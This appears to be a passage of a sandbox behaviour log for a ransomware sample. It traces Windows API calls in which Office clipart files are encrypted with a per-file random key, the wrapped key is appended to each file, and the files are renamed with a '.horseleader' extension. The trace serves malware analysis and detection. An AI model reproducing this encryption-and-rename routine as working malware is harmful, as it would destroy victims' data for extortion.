WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2cec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2cec, lpOverlapped=0x0) returned 1 [0253.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.597] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.597] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.597] CloseHandle (hObject=0x158) returned 1 [0253.597] GetProcessHeap () returned 0x780000 [0253.597] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.597] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.horseleader") returned 79 [0253.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.horseleader")) returned 1 [0253.598] GetProcessHeap () returned 0x780000 [0253.598] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.598] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeba4c700, 
ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeba4c700, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00921_.WMF", cAlternateFileName="")) returned 1 [0253.598] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="Windows") returned -1 [0253.598] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 67 [0253.598] StrStrIW (lpFirst="BL00921_.WMF", lpSrch=".horseleader") returned 0x0 [0253.598] lstrcmpW (lpString1="BL00921_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.598] lstrcmpW (lpString1="BL00921_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.598] lstrlenW (lpString=".testttjffg") returned 11 [0253.599] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.599] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.599] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.600] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 67 [0253.600] StrStrW (lpFirst="BL00921_.WMF", lpSrch=".txt") returned 0x0 [0253.600] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4408) returned 1 [0253.600] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1138, lpOverlapped=0x0) returned 1 [0253.603] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeec8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.603] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1138, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1138, lpOverlapped=0x0) returned 1 [0253.603] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.603] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.603] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.603] CloseHandle (hObject=0x158) returned 1 [0253.603] GetProcessHeap () returned 0x780000 [0253.604] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.604] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.horseleader") returned 79 [0253.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BL00921_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.horseleader")) returned 1 [0253.605] GetProcessHeap () returned 0x780000 [0253.605] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.605] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74832900, ftCreationTime.dwHighDateTime=0x1bd4bf7, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74832900, ftLastWriteTime.dwHighDateTime=0x1bd4bf7, nFileSizeHigh=0x0, nFileSizeLow=0x1870, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00923_.WMF", cAlternateFileName="")) returned 1 [0253.605] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="Windows") returned -1 [0253.605] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 67 [0253.605] StrStrIW (lpFirst="BL00923_.WMF", lpSrch=".horseleader") returned 0x0 [0253.605] lstrcmpW (lpString1="BL00923_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.605] lstrcmpW (lpString1="BL00923_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.605] lstrlenW (lpString=".testttjffg") returned 11 [0253.605] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.606] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.606] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.606] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 67 [0253.607] StrStrW (lpFirst="BL00923_.WMF", lpSrch=".txt") returned 0x0 [0253.607] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6256) returned 1 [0253.607] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1870, lpOverlapped=0x0) returned 1 [0253.609] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe790, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.609] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1870, lpOverlapped=0x0) returned 1 [0253.609] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.609] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.609] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.609] CloseHandle (hObject=0x158) returned 1 [0253.610] GetProcessHeap () returned 0x780000 [0253.610] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 
[0253.610] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.horseleader") returned 79 [0253.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.horseleader")) returned 1 [0253.611] GetProcessHeap () returned 0x780000 [0253.611] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.611] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4c14, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00932_.WMF", cAlternateFileName="")) returned 1 [0253.611] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="Windows") returned -1 [0253.611] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 67 [0253.611] StrStrIW (lpFirst="BL00932_.WMF", lpSrch=".horseleader") returned 0x0 [0253.611] lstrcmpW (lpString1="BL00932_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.611] lstrcmpW (lpString1="BL00932_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.611] lstrlenW (lpString=".testttjffg") returned 11 [0253.611] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF", lpSrch=".testttjffg") 
returned 0x0 [0253.611] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.612] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.612] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 67 [0253.612] StrStrW (lpFirst="BL00932_.WMF", lpSrch=".txt") returned 0x0 [0253.612] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=19476) returned 1 [0253.612] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4c14, lpOverlapped=0x0) returned 1 [0253.615] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb3ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.615] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4c14, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4c14, lpOverlapped=0x0) returned 1 [0253.615] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.615] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, 
lpOverlapped=0x0) returned 1 [0253.615] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.615] CloseHandle (hObject=0x158) returned 1 [0253.616] GetProcessHeap () returned 0x780000 [0253.616] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.616] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.horseleader") returned 79 [0253.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.horseleader")) returned 1 [0253.617] GetProcessHeap () returned 0x780000 [0253.617] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.617] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7d46d00, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7d46d00, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0xeb8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00985_.WMF", cAlternateFileName="")) returned 1 [0253.617] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="Windows") returned -1 [0253.617] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 
67 [0253.617] StrStrIW (lpFirst="BL00985_.WMF", lpSrch=".horseleader") returned 0x0 [0253.617] lstrcmpW (lpString1="BL00985_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.617] lstrcmpW (lpString1="BL00985_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.617] lstrlenW (lpString=".testttjffg") returned 11 [0253.617] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.617] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.617] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.617] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.618] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 67 [0253.618] StrStrW (lpFirst="BL00985_.WMF", lpSrch=".txt") returned 0x0 [0253.618] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3768) returned 1 [0253.618] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xeb8, lpOverlapped=0x0) returned 1 [0253.621] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff148, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.621] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xeb8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xeb8, lpOverlapped=0x0) returned 1 [0253.621] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.621] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.621] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.621] CloseHandle (hObject=0x158) returned 1 [0253.622] GetProcessHeap () returned 0x780000 [0253.622] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.622] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.horseleader") returned 79 [0253.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf.horseleader")) returned 1 [0253.623] GetProcessHeap () returned 0x780000 [0253.623] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.623] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, 
ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0xd16, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BOAT.WMF", cAlternateFileName="")) returned 1 [0253.623] lstrcmpiW (lpString1="BOAT.WMF", lpString2="Windows") returned -1 [0253.623] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 63 [0253.623] StrStrIW (lpFirst="BOAT.WMF", lpSrch=".horseleader") returned 0x0 [0253.623] lstrcmpW (lpString1="BOAT.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.623] lstrcmpW (lpString1="BOAT.WMF", lpString2="_uninstalling_.png") returned 1 [0253.623] lstrlenW (lpString=".testttjffg") returned 11 [0253.623] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF", lpSrch=".testttjffg") returned 0x0 [0253.623] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.623] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned 63 [0253.624] StrStrW (lpFirst="BOAT.WMF", lpSrch=".txt") returned 0x0 [0253.624] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3350) returned 1 [0253.624] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd16, lpOverlapped=0x0) returned 1 [0253.626] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2ea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.627] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd16, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd16, lpOverlapped=0x0) returned 1 [0253.627] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.627] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.627] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.627] CloseHandle (hObject=0x158) returned 1 [0253.627] GetProcessHeap () returned 0x780000 [0253.627] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.627] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.horseleader") returned 75 [0253.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf.horseleader")) returned 1 [0253.629] GetProcessHeap () returned 0x780000 [0253.629] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.629] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0x714c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BOATINST.WMF", cAlternateFileName="")) returned 1 [0253.629] lstrcmpiW (lpString1="BOATINST.WMF", lpString2="Windows") returned -1 [0253.629] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") 